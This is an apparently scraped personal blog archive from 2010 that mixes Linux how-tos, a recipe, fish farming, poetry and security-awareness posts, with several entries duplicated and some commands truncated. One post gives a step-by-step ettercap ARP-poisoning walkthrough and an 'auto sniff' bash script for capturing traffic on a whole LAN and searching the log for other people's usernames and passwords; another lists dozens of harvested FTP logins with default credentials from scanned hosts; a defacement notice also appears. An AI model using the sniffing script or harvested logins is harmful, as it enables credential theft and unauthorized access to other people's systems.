
Wednesday, December 29, 2010

[Buang waktu]

1. Terakhir liat org yg bener2 lo
** tadi
2. Binatang terakhir yang dilihat?
** nyamuk
3. Sms terakhir yang diterima dari?
4. Lagu terakhir yang didengar?
** Nicholas Tse & Charlene Choi - sacred love
5. Yg pengen bgt dilakuin?

Wednesday, November 17, 2010

Transformation pack Mac (windows&linux)

kali ini saya mau share tentang windows.,hee..

kita akan merubah tampilan windows (khusus 7 & vista), menjadi 100 % mirif dengan snow leopard
tidak ada tingkat kesulitan yang di alami disini..hanya tinggal klik saja..maka theme windows dalam sekejap
akan berubah menjadi macOSx snow lopard
ini screnshotnya saya kasih...
Transformation ini sudah rilis dua kali ternyata.,.ahaha.,.
ini yang versi terakhirnya..
monggo yang pengen...

namun masih terdapat banyak kekurangan,,tentunya..& ironisnya..kita tidak bisa ikut memperbaiki bugnya..
ahahaha.,.inilah kenapa saya lebih senang menggunakan linux daripada windows.,.:p

okey tulisan ini akan saya lanjutkan ke tampilan MacOSx di ubuntu...
jangan salah..dengan open source..hee..
ubuntu juga punya transformation pack..untuk merubah tampilan standard menjadi persis 1000 % denga mac..ahaayy..
berikut langkah-langkahnya ga...

ga pakai klik...:D

tetap command di terminal menjadi andalan.,.:*

Buka terminal lalu ketikkan code berikut

# wget Macbuntu-10.04.tar.gz -O /tmp/Macbuntu-10.04.tar.gz

# tar xzvf /tmp/Macbuntu-10.04.tar.gz -C /tmpcd /tmp/Macbuntu-10.04/

# ./


Install Macbuntu pada Ubuntu 10.10

Buka terminal lalu ketikkan code berikut / copy & paste aja dari sini :

# wget -O /tmp/Macbuntu-10.10.tar.gz

# tar xzvf /tmp/Macbuntu-10.10.tar.gz -C /tmp

# cd /tmp/Macbuntu-10.10/

# /

tunggu hingga selesai

 untuk meng Uninstall Macbuntu buka terminal anda lalu masukan code berikut :. /

copas juga ga papa gan,..:D

hhhmmm.,.kalo ada bug..atau ada apa az yang menurut kita kurang maknyuss...
maka bisa di edit-edit sendiri...sesuai dengan keinginan hati...:)
oh y..ini screnshotnya transpormation mac di ubuntu...

silahkan gan...di coba2 sendiri...semoga berhasil...:)

regards yur4kh4

Monday, November 15, 2010

./ + penjelasan

hi saya yur4kh4.,:)

saLam sejahtera..
kali ini kita akan membahas tentang ettercap

Ettercap adalah sebuah alat yang dibuat oleh Alberto Ornaghi (AloR) dan Marco Valleri (NaGa) dan pada dasarnya adalah sebuah perlengkapan untuk penyerangan “penengah” pada sebuah LAN ataupun WLAN. Untuk mereka yang tidak menyukai perintah berbaris (CLI), alat bentu ini disediakan dengan antar muka grafis yang mudah.
Ettercap memungkinkan membentuk serangan melawan protokol ARP dengan memposisikan diri sebagai “penengah, orang yang ditengah” dan, jika sudah berada pada posisi tersebut, maka akan memungkinkan untuk :
- menginfeksi, mengganti, menghapus data dalam sebuah koneksi
- melihat password pada protokol-protokol seperti FTP, HTTP, POP, SSH1, dan lain-lain.
- menyediakan SSL sertifikasi palsu dalam bagian HTTPS pada korban.
- dan lain-lain.
woow.,.bisa di bayangkan apa bahayanya jika mesin / computer kita..di bajak oleh seorang sniffer...:D
hal ini tentu sangat merugikan kita sebagai seorang client..
baikLah..kali ini penulis akan menjelaskan bagaimana melakukan serangan ini..
penulis tidak mengajarkan temand-temand untuk menjadi seeorang sniffer..
melainkan hanya untuk memberitahukan bagaimana cara kerjanya saja..
dengan tujuan agar kita lebih berhati-hati pada saat terkoneksi ke internet..

1 install ettercapnya dulu
# sudo apt-get install ettercap
2. konfigurasi lach.,.:)
# sudo gedit /etc/etter.conf
cari baris ini..

#       redir_command_on/off
# you must provide a valid script for your operating system in order to have
# the SSL dissection available
# note that the cleanup script is executed without enough privileges (because
# they are dropped on startup). so you have to either: provide a setuid program
# or set the ec_uid to 0, in order to be sure the cleanup script will be
# executed properly
# NOTE: this script is executed with an execve(), so you can't use pipes or
# output redirection as if you were in a shell. We suggest you to make a script if
# you need those commands.

#     Linux

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

hilangkan tanda ' # ' . kemudian save...ukey...

3. jalankan ettercapnya..
# sudo ettercap -Tq -i wlan0 -M arp // //

penjelasan :
-T = mode ettercapnya
-i = interface yang aktif (bisa di lihat dg mengetikan ifconfig di terminal)
-q quiet mode
-M = arp poisoning
sementara tanda // // adalah default gatway & client ini bisa di isi dengan ip victim (jika victim tunggal)

jangan lupa forward ip juga ya...
# echo 1 > /proc/sys/net/ipv4/ip_forward

ukey.,.selesai...tinggal tunggu hasilnya saja.,.:)

NB :
jika belum familiar dengan console..
saya sudah siapkan sdkit script bashnya...
jadi tinggal jalankan 1 script saja..udh bisa jalankan ettercap koq..

langsung copas scriptnya...:)
--------------cut here-----------------------------------------------
#                  c0de by yur4kh4                     #
#                    auto sniff                        #
#                Malang cyber crew                     #
#        contact :yur4kh4[at]mc-crew[dot]net           #
sleep 3
echo "jangan malas untuk menulis di console"
sleep 2
echo -n "network card yang terkoneksi gan? ex: wlan0: "
read -e IFACE
echo -n "Gateway IP - biarkan kosong (default): "
read -e ROUTER
echo -n "Target IP - biarkan kosong (babat semua IP): "
read -e VICTIM
ettercap -Tq -i $IFACE -M arp /$ROUTER/ /$VICTIM/ -w yur4.txt

--------------cut here-----------------------------------------------
save dengan nama

kemudian beri hak akses root
# chmod +x
masih di terminal jalankan dech scriptnya
# ./

tinggal tunggu saja...

pastikan ettercap sudah di install & sudah di konfigurasi dengan benar...
pastikan juga bahwa ip sudah di forward..

untuk berhenti tekan ' q ' 'Q' <

script ini akan menghasilkan log yur4.txt

buka hasil log tersebut...
menggunakan kate or apa saja lach yang penting bisa terbaca...:p

kemudian search or ctrl F masukan keywords "pass" atau bisa juga "user"
kalo ada yang tersniffing maka akan tampil tu user sama pass orang.,.:p

tested on backtrack 4

Thursday, November 11, 2010

november 2010

mungkin jika rindu ini bisa bicara ia akan bicara...

mungkin jika sayang ini bisa bicara ia pun akan bicara

mungkin jika cinta ini bisa bicara aku yakin ia pun akan bicara

tak ada yang bisa mereka ucapkan selain namamu..

tak ada satu orangpun yang tau..bagaimana caraku mencintaimu..
bagaimana caraku menjagamu
bagaimana caraku mencintaimu
bagaimana caraku saat rindu denganmu

& bahkan kau sendiri tak pernah tau...tetang hal itu..
seperti tak cinta & tak rindu..aku padamu..
seperti tak sedikitpun aku merindukanmu..

namun jauh di luar batas nalarmu terhadapku...

aku sangat mencintai..& bahkan stiap detik aku ingin bersamamu..
merangkai mimpi...& menjadi yang terbaik di hatimu...

aku tak bisa kau ukur dengan kata & perhatian...
& aku pun tak mengukur rasa cintamu..dengan semua itu....


ini ada sdikit script…:)
sebenarnya script ini di tuLis oleh saLah satu member
forum BT..:p
kebetuLan saya juga pengen bikin yang ky ginian..
tp berhubung sudah ada yang buat y..tak pinjem dulu dech…:p
ntr nyusul yang lebih di sederhanakan…lagi..amin…
beberapa aplikasi yang otomatis di jalankan adalah
1. wireshark
so yang blum ada aplikasi-aplikasi itu di compienya..
sebaiknya di install dulu yach…yang di butuhkan..
recomended backtrack..jd ga perlu install2 lagi karna sudah ada..semua :)
langsung sedot gan…
beri hak akses root dulu gan..
$ chmod 755
sekarang jalankan dech…
$ ./
ikuti perintah selanjutnya…:)
semoga bermanfaat
tested on backtrack 4
regards yur4kh4

Wednesday, November 10, 2010

Mengawinkan Kamboja Jepang

Sebelum mengawinkan bunga Kamboja Jepang yang selanjutnya di sebut dengan “Adenium”, terlebih dahulu harus mengetahui bagan-bagan dari bunga Adenium tersebut. Jika kita sudah mengetahui bagan-bagan bunga ini maka kita dengan mudah dapat megawinkannya. Setiap bungan Adenium berkelamin ganda yang artinya satu bunga memiliki alat kelamin jantan yaitu “Serbuk Sari” dan alat kelamin betina “Putik”. Tahap pertama adalah mengambil serbuk sari dari bunga Adenium yang sudah mekar 4-5 hari dari awal mekar. Jika kita lihat di dalam bunga adenium terdapat 5 benang yang pangkalnya berbentuk kerucut, maka jika kerucut di buka akan terlihat serbuk sari pada ujung kerucut. berikut gambar Serbuk Sarinya:

Tuesday, October 26, 2010

Nautilus di ubuntu 10.10 Maverick

manfaatkan fitur tambahan pada nautilus yang di tambahkan pada ubuntu maverick 10.10

seperti yang anda lihat di gambar...
bahwa nautilus yang ada pada ubuntu 10.10 maverick
memiliki Terminal yang tertanam dengan Nautilus secara default dan Anda dapat mengaktifkannya dengan menekan F7

selain itu apabila VGA card anda support maka anda bisa melihat effect 3D yang akan di tampilkan oleh ubuntu 10.10 anda...:)
hanya dengan menekan F4

sementara untuk mempermudah pekerjaan anda..mungkin bisa menekan F3..maka akan tampil
dua tab folder..dengan kata lain commander lach.,.hee.,.:)

tanpa berpanjang lebar...

langsung saja di install yach..

Cukup tambahkan ppa SD nautilus dan melakukan upgrade.

command : ===>>>
sudo add-apt-repository ppa:am-monkeyd/nautilus-elementary-ppa
sudo apt-get update && sudo apt-get dist-upgrade
nautilus -q
---------------------------------------------------------------- source indonesia....:)

saLam yur4kh4

Wednesday, October 13, 2010

buntut ala tengkleng

500 gram buntut sapi
3 cm kayu manis
1 buah pekak
1.000 cc air
3 lembar daun salam
3 cm lengkuas, memarkan
2 batang serai, memarkan
6 lembar daun jeruk
2 sendok makan kecap manis

Monday, October 11, 2010

Microsoft Kinect Motion Sensor With XBOX 360

Microsoft Kinect Motion Sensor With XBOX 360 VideoIsn't This Awesome...Now lets go into the details.:The Kinect sensor is a horizontal bar connected to a small base with a motorized pivot, and is designed to be positioned lengthwise below the video display. The device features an "RGB camera, depth sensor and multi-array microphone running proprietary software", which provides full-body 3D motion

Thursday, September 16, 2010

Un-Trusted Downloads May Crash Your PC

Cyber criminals may get into your PC via unsafe downloads online. So beware about such kind of downloads and ensure you are safe. Here is the full security awareness article for your reference, Just visit

Friday, September 03, 2010

Which Linux Distro is best for me....

Best Linux for me

Hi all,
I am back with my next blog. In this article I am going to help those who are planning to install linux for some reason  but are confused to select linux disto because there  are plenty of linux freely available to download. So which linux should I install here is mentioned :
1.I Just want to try linux :

If you just want to try linux then you don’t need to install it at all,
For this you can test linux with the help of Linux live CD known as ‘knoppix “.
Almost all Linux distro provide their live cd.
The user can run many different software applications and he may also save documents / files created during a Live CD session to persistent storage like a hard disk or a flash drive.
A Linux Live CD can also be used in situations when your windows has crashed and you want to save your existing data on another media before reinstalling windows. The only problem is that such distributions tend to run slower than fully installed Linux distributions.

You can also try linux on your windows machine with some virtualization software like Virtual PC (Microsoft ),Virtual Box or with VMWare

2.Linux for Home users /Notebooks :

With my personal experience to linux I think that Ubantu and PCLinuxOS are two best destro of linux for home users. Ubantu and PC Linux OS both offer user friendly applications,Games , Desiging softwares and office Packages. Personaly I installed ubantu in my HP Laptop in 2009 dual boot with windows XP. In  my same laptop ( P4,2.4 GHz /512 MB ) I was unable to run Windows Vista and Windows 7 properly.Even my windows XP takes more than one minute to boot up after grub selection , wheres as my ubantu 10.04 (Lucid Lynx ) takes less than 40 seconds in the same notebook. I run music audio and video files (almost any formate ) in VLC media player and using firefox for fastbrowsing and Impathy for gmail and  hotmails chat client.
It has a predictable, six-month release schedule, with occasional Long Term Support (LTS) .Ubuntu is also notable for its ease of use and its inclusion of a migration assistant for Windows users and support for the latest technologies. Version 10.10 of Ubuntu--also known asMaverick Meerkat--will include a multitouch and gesture stack. The final iteration of that version is due out next month  Personaly I don’t remember when I have logged in to windows in my laptop after Ubantu.

On the other hand if you have good hardware (any new computer P4 2.0 or above with more than 1 GB ram then Fedora 11,and Fedora 12 are also very good choices.

3.Linux for old computers :

Puppy Linux is a Live CD distribution that has a small installer and will run just fine on computers with RAM as little as 64 MB. Puppy Linux can boot from several media including USB flash drives, CD or a zip drive. Puppy Linux will run totally in RAM so make sure you save the modified personal files to a disk else you’ll lose the changes when the system shuts down.
Xubuntu, a variant of Ubuntu is also a possibility. Xubuntu uses xfce, a desktop environment that uses less system resources than GNOME that comes with the Ubuntu distribution. Xubuntu versions are released twice a year, coinciding with Ubuntu releases.
antiX is another good choice for old computers – it should run on systems that were considered slow when Windows 98 was released (like the Pentium II series). Damn Small Linux and Zenwalk are other variations that have minimal hardware requirements.

4. Linux for Commercial /Production Environment :

For  core production /Comercial Environement I will recommend some enterprise version of linux such as Red Hat Enterprise Linux ,Oracle Enterprise or suse Enterprise Linux.
However Cent OS is a very good choice if you don’t need any support. It is just clone of Red Hat Enterprise Linux without any official support of Red Hat. All  the Red Hat Logos are removed in Cent OS. In my office we are using CentOS as mail server from last 3 years withour any issue till date.
Fedora is also a good choice for both server and desktop end.
And finally Ubantu is always free there.

                       Finaly if you have sufficient resources than you not try to hesitate to taste each flavor of Linux….


                                                                              Satish Malanch

Which Linux Distro is best for me....

Best Linux for me

Hi all,
I am back with my next blog. In this article I am going to help those who are planning to install linux for some reason  but are confused to select linux disto because there  are plenty of linux freely available to download. So which linux should I install here is mentioned :
1.I Just want to try linux :

If you just want to try linux then you don’t need to install it at all,
For this you can test linux with the help of Linux live CD known as ‘knoppix “.
Almost all Linux distro provide their live cd.
The user can run many different software applications and he may also save documents / files created during a Live CD session to persistent storage like a hard disk or a flash drive.
A Linux Live CD can also be used in situations when your windows has crashed and you want to save your existing data on another media before reinstalling windows. The only problem is that such distributions tend to run slower than fully installed Linux distributions.

You can also try linux on your windows machine with some virtualization software like Virtual PC (Microsoft ),Virtual Box or with VMWare

2.Linux for Home users /Notebooks :

With my personal experience to linux I think that Ubantu and PCLinuxOS are two best destro of linux for home users. Ubantu and PC Linux OS both offer user friendly applications,Games , Desiging softwares and office Packages. Personaly I installed ubantu in my HP Laptop in 2009 dual boot with windows XP. In  my same laptop ( P4,2.4 GHz /512 MB ) I was unable to run Windows Vista and Windows 7 properly.Even my windows XP takes more than one minute to boot up after grub selection , wheres as my ubantu 10.04 (Lucid Lynx ) takes less than 40 seconds in the same notebook. I run music audio and video files (almost any formate ) in VLC media player and using firefox for fastbrowsing and Impathy for gmail and  hotmails chat client.
It has a predictable, six-month release schedule, with occasional Long Term Support (LTS) .Ubuntu is also notable for its ease of use and its inclusion of a migration assistant for Windows users and support for the latest technologies. Version 10.10 of Ubuntu--also known asMaverick Meerkat--will include a multitouch and gesture stack. The final iteration of that version is due out next month  Personaly I don’t remember when I have logged in to windows in my laptop after Ubantu.

On the other hand if you have good hardware (any new computer P4 2.0 or above with more than 1 GB ram then Fedora 11,and Fedora 12 are also very good choices.

3.Linux for old computers :

Puppy Linux is a Live CD distribution that has a small installer and will run just fine on computers with RAM as little as 64 MB. Puppy Linux can boot from several media including USB flash drives, CD or a zip drive. Puppy Linux will run totally in RAM so make sure you save the modified personal files to a disk else you’ll lose the changes when the system shuts down.
Xubuntu, a variant of Ubuntu is also a possibility. Xubuntu uses xfce, a desktop environment that uses less system resources than GNOME that comes with the Ubuntu distribution. Xubuntu versions are released twice a year, coinciding with Ubuntu releases.
antiX is another good choice for old computers – it should run on systems that were considered slow when Windows 98 was released (like the Pentium II series). Damn Small Linux and Zenwalk are other variations that have minimal hardware requirements.

4. Linux for Commercial /Production Environment :

For  core production /Comercial Environement I will recommend some enterprise version of linux such as Red Hat Enterprise Linux ,Oracle Enterprise or suse Enterprise Linux.
However Cent OS is a very good choice if you don’t need any support. It is just clone of Red Hat Enterprise Linux without any official support of Red Hat. All  the Red Hat Logos are removed in Cent OS. In my office we are using CentOS as mail server from last 3 years withour any issue till date.
Fedora is also a good choice for both server and desktop end.
And finally Ubantu is always free there.

                       Finaly if you have sufficient resources than you not try to hesitate to taste each flavor of Linux….


                                                                              Satish Malanch

Tuesday, August 31, 2010

New Computer Security Forum Launched!

Recently Hermesmyth, an India based Online Marketing Services company has launched an new computer security forum �SafeScribble�. SafeScribble Computer Security Forum aims at discussing and solving computer virus related problems and, suggesting the best antivirus software for computer users.

SafeScribble PC Security Forum now invites antivirus technology experts to join the discussion and help grow the community by contributing security related articles and helping the forum users of their pc related questions. Also SafeScribble invites individuals and business users to share their virus related problems by registering in the discussion board for free and make use of it.

To register for free, please visit

Monday, August 16, 2010

[Ternak Ikan Lele.........]

Ikan lele merupakan jenis ikan air Tawar yang dapat dibudidayakan. Alas an orang budidaya lele adalah dapat dibudidayakan di lahan dan sumber air yang terbatas, cara lebih mudah, pemasarannya relatif mudah dan modal dapat dijangkau. Budidaya lele semakin meningkat setelah masuk jenis lele dumbo. Keunggulan lele dumbo dibanding lele lokal antara lain cepat besar, telur lebih banyak dan lebih tahan terhadap penyakit.

Pertumbuhan yang cepat tanpa memperhatikan pengelolaan induk menyebabkan kualitas lele menurun. Penurunan kualitas dapat karena perkawinan inbreeding. Ini menyebabkan penurunan derajat penetasan,
pertumbuhan lambat, daya tahan penyakit menurun.

Monday, August 09, 2010

Web Server Security

Operating Systems still continue to be vulnerable to attacks if the security patches are not installed periodically, which gives way to malwares and massive internet worms. Sometime ago, the internet worm conficker, which is also known as downadup was creating big chaos over the internet, which lead to huge losses to the corporate and website owners. Meanwhile there was also number of buffer overflow attacks reported during the year 2009. It�s quite common that all the web servers do have vulnerability, but its good the website owner need to safeguard their valuable digital assets by periodically updating the security patches and by running quality server security software products, which would prevent from the web server being vulnerable i.e. accessible to the hackers.

Below are a few one-liner precautionary steps that will help you in securing your Web server.
1. Install the Security Patches whenever available
2. Check the client side of the website by running a Malware Scan to ensure the users are safe
3. Disable the unnecessary scripting languages in your web servers, as hacker may target them
4. Subscribe and Keep monitoring the security vendor's security alerts
5. Most importantly use a tough Alpha-numeric-Symbol based password
6. Check for vulnerabilities by running a vulnerability analyser to check your web server security holes
7. Set up permissions at different levels so that no one can access as an administrator, expect the person intended for.
8. DON'T test any new or unknown scripts in your main web server, because some untrusted scripts may inject a malware in your server

Also, now Google provides a free tool called "SkipFish" - a web application security reconnaissance tool, which can run a security audit to your website. Here is the link for your convenience
Still wondering how the attack takes place, here is a pictorial representation of Top Cyber Security Risks by

Friday, June 25, 2010

Installing Flash Player in Fedora Machine

Usualy we cannot open web pages containng Flash images in Fedora linux because flash player in not installed by default. And as we try to install missing plug-in we get error. so here is procedure to install flash player.

First of all download rpm  or tar format flash plugin form adobe website. In my case i downloaded .rpm format to my /tmp directory . now open terminal and change your working directory to /tmp
and type following

[root@linux1 tmp]# rpm -ivh flash-plugin-
Preparing...                ########################################### [100%]
   1:flash-plugin           ########################################### [100%]

The .rpm file also copies the adobe General Public Key (GPG key) to /etc/pki/rpm-gpg/RPM-GPG-KEY-adobe-linux but does not import it. To import the key, type:

[root@linux1 tmp]# rpm --import /etc/pki/rpm-gpg/RPM-GPG-KEY-adobe-linux

Now install plug-in with yum command
[root@linux1 tmp]# 
yum install flash-plugin alsa-plugins-pulseaudio \
and finaly

[root@linux1 tmp]# yum install nspluginwrapper 
Now you can open any web contain flash.
Satish Malanch  

Installing Flash Player in Fedora Machine

Usualy we cannot open web pages containng Flash images in Fedora linux because flash player in not installed by default. And as we try to install missing plug-in we get error. so here is procedure to install flash player.

First of all download rpm  or tar format flash plugin form adobe website. In my case i downloaded .rpm format to my /tmp directory . now open terminal and change your working directory to /tmp
and type following

[root@linux1 tmp]# rpm -ivh flash-plugin-
Preparing...                ########################################### [100%]
   1:flash-plugin           ########################################### [100%]

The .rpm file also copies the adobe General Public Key (GPG key) to /etc/pki/rpm-gpg/RPM-GPG-KEY-adobe-linux but does not import it. To import the key, type:

[root@linux1 tmp]# rpm --import /etc/pki/rpm-gpg/RPM-GPG-KEY-adobe-linux

Now install plug-in with yum command
[root@linux1 tmp]# 
yum install flash-plugin alsa-plugins-pulseaudio \
and finaly

[root@linux1 tmp]# yum install nspluginwrapper 
Now you can open any web contain flash.
Satish Malanch  

Playing Movies on Ubantu 10.04 Linux with VLC Media Player

Installing VLC Media Player on Ubantu 10.04

Insatlling vlc media player is quite simple in ubantu-box

open terminal and type

% sudo apt-get update
% sudo apt-get install vlc vlc-plugin-pulse mozilla-plugin-vlc
and enjoy
..................Satish Malanch

Playing Movies on Ubantu 10.04 Linux with VLC Media Player

Installing VLC Media Player on Ubantu 10.04

Insatlling vlc media player is quite simple in ubantu-box

open terminal and type

% sudo apt-get update
% sudo apt-get install vlc vlc-plugin-pulse mozilla-plugin-vlc
and enjoy
..................Satish Malanch

Tuesday, June 22, 2010

Playing movies ,songs in Fedora linux ,Installing VLC in Linux

One  of the main reason why home users dont prefer linux to use is that they can t play music on linux machine. This article will describe how to play movies in your fedora linux. VLC media player is capable to play any music file . by default Fedora does not come with VLC media player. So here i am going to explain how to install VLC  media Player in Linux. This not big game just 3 step procedure. All you need to have a Fedora working machine with  configured and working yum repositry and a stabel internet connection.

Open terminal and type there: ( you must be login with root otherwise try su )

[root@malanch ~]# rpm -ivh

This will display like this:

warning: /var/tmp/rpm-tmp.cqf8YE: Header V3 RSA/SHA256 signature: NOKEY, key ID 8fcff4da
Preparing...                ########################################### [100%]
   1:rpmfusion-free-release ########################################### [100%]

now type :
[root@linux ~]# yum install vlc

and you are done . now you can play any music file (.dat,.3gp,.mpg,vob,avi ) in your linux machine.

Playing movies ,songs in Fedora linux ,Installing VLC in Linux

One  of the main reason why home users dont prefer linux to use is that they can t play music on linux machine. This article will describe how to play movies in your fedora linux. VLC media player is capable to play any music file . by default Fedora does not come with VLC media player. So here i am going to explain how to install VLC  media Player in Linux. This not big game just 3 step procedure. All you need to have a Fedora working machine with  configured and working yum repositry and a stabel internet connection.

Open terminal and type there: ( you must be login with root otherwise try su )

[root@malanch ~]# rpm -ivh

This will display like this:

warning: /var/tmp/rpm-tmp.cqf8YE: Header V3 RSA/SHA256 signature: NOKEY, key ID 8fcff4da
Preparing...                ########################################### [100%]
   1:rpmfusion-free-release ########################################### [100%]

now type :
[root@linux ~]# yum install vlc

and you are done . now you can play any music file (.dat,.3gp,.mpg,vob,avi ) in your linux machine.

Tuesday, June 08, 2010

Top Identity Theft Methods

According to the FTC, over the past 5 years over 27.3 million people have had their identity stolen. That's a scary number, made more concerning by the fact that most people don't even realize their identity has been "borrowed" until after the damage is done. At this very minute, someone could be merrily opening credit card accounts and applying for mortgages under your name. It's important to take steps to actively protect your identity. The first step is to be aware of the various methods thieves have of obtaining your personal information. Some of them are predictable, while others are more surprising. The list below is a great starting point.
  • Getting your credit card information during an in-person transaction: This usually happens at a retail location where you're using your credit card to make a payment. Thieves can see and memorize your credit card info (or just write it down) and then turn around and use it to make their own purchases. They have even been known to resort to taking pictures of your card with a long range camera lens!
  • Stealing your mail: Make sure your mailbox has a sturdy lock, and that you keep a close watch on your mail trends. Haven't gotten any mail for a while? A thief may have submitted a change of address on your behalf to have your billing statements mailed to an address they control. They can then apply for credit card offers that you receive and obtain credit cards in your name.
  • Stolen wallets or purses: If your wallet or purse has been taken or "lost," immediately cancel all the credit cards. This is also a good time to put a credit freeze on your credit records at all 3 credit bureaus and start looking into identity theft protection services.
  • Dumpster diving: You'd be surprised how much personal information people throw in the trash. It's easy for thieves to acquire this information and use it for their own means. Make sure you shred all your documents and take the proper precautions.
  • Eavesdropping on phone conversations: People are usually pretty lax about what they'll say on the phone. With the advent of mobile phones, it's very easy for a thief to overhear you divulging personal information to a friend. Always be aware of what you're saying and who might be around you.
  • Phishing: This is a common email scam where you receive an email from a company of authority, such as your bank, PayPal or eBay. The email will ask you to provide personal information (like a password) by responding to the email or going to a link in the email, or even by calling them. Do not ever respond to these emails! No legitimate company will ever ask you for personal information via email.
  • Computer viruses: Hackers can create viruses that will invade your computer, acquire personal information, and send that information back to the hacker. Always have a current version of internet security software installed on your computer and make sure you keep it up to date.
  • Intercepting data from insecure sites or networks: If you're accessing your bank account or shopping online, make sure the site is encrypted. Look for a "https://" at the front of the URL. This indicates the site utilizes SSL encryption to keep your online transactions safe.
  • Pretexting or Social Engineering: This occurs when a thief uses false pretenses to get your personal information. One popular scheme is to call you, pretending to be your bank, utility company or other institution that might have access to your personal information. They will then ask for you to provide or confirm some piece of personal information. If someone calls you, don't give this information to them. Instead, look up the number of the company (if it's a bank or credit company, usually the number will be on the back of your card), and call them directly.

Some of the schemes mentioned above are fairly easy to protect against, others are more challenging. It's a good idea to stay on top of your credit records, as suspicious changes or updates to your credit history can indicate potential identity theft. The easiest way to do this is by signing up for an identity theft protection These services will usually monitor your credit history and actively stay on top of any leaks or use of your personal information.

Friday, May 14, 2010




Wednesday, April 28, 2010

Hacked by Arumbia Team


Hacked by Arumbia Team


Hacked by Arumbia Team


Friday, April 16, 2010

FTP Accounnt From Ip Malingsial

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ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: Tornado-vxWorks (VxWorks5.4.2) FTP server ready
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.
ftp://admin:password@ banner: FTP Server (Version 1.0) ready.

ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:pass@ banner: Microsoft FTP Service
ftp://upload:pass@ banner: Microsoft FTP Service
ftp://upload:pass@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:pass@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://upload:pass@ banner: Microsoft FTP Service
ftp://root:test123@ banner: Microsoft FTP Service
ftp://upload:upload@ banner: Microsoft FTP Service
ftp://root:test123@ banner: Microsoft FTP Service
ftp://root:test123@ banner: Microsoft FTP Service
ftp://root:test123@ banner: Microsoft FTP Service
ftp://root:test123@ banner: Microsoft FTP Service
ftp://root:test123@ banner: Microsoft FTP Service
ftp://root:test123@ banner: Microsoft FTP Service
ftp://root:test123@ banner: Microsoft FTP Service
ftp://root:test123@ banner: Microsoft FTP Service
ftp://admin:123456@ banner: Microsoft FTP Service
ftp://admin:123456@ banner: Microsoft FTP Service
ftp://admin:123456@ banner: Microsoft FTP Service
ftp://admin:123456@ banner: Microsoft FTP Service
ftp://admin:123456@ banner: Microsoft FTP Service
ftp://admin:123456@ banner: Microsoft FTP Service
ftp://admin:123456@ banner: Microsoft FTP Service
ftp://admin:123456@ banner: Microsoft FTP Service
ftp://admin:123456@ banner: Microsoft FTP Service
ftp://admin:123456@ banner: Microsoft FTP Service
